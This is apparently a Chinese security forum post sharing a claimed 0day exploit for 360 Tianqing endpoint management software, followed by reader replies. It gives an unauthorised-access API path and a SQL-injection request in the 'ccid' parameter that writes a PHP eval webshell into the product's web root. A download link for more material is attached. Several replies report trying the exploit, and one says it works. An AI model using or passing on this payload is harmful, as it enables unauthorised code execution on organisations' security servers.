360新天擎,0dey,4.8hvv,gobyEXP

GET ​/api/dbstat/gettablessize

越权访问
image

/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('<?php @eval($_POST[1]);?>');copy O(T) to 'C:/Program Files (x86)/360/skylar6/www/1.php';drop table O;--

注入GETshell

image

链接: https://pan.baidu.com/s/1oDn7Qii0SfNq9Ie3IEneWw 提取码: rd4d 复制这段内容后打开百度网盘手机App,操作更方便哦

2 个赞

大佬牛了,我悄悄复现一下试试。

感谢大师傅的POC;如果使用单位没有更新最新固件是会有漏洞的,新版本无问题。再次感谢提供测试POC的大师傅。

这么快就出来了

试了试 可以用,就是一句话传不上,估计过不了360吧.

有想要一起复现漏洞编辑gobyExp的小伙伴可以加我微信一起交流,aXZpMjEy=

别动不动就写0day,做个人吧。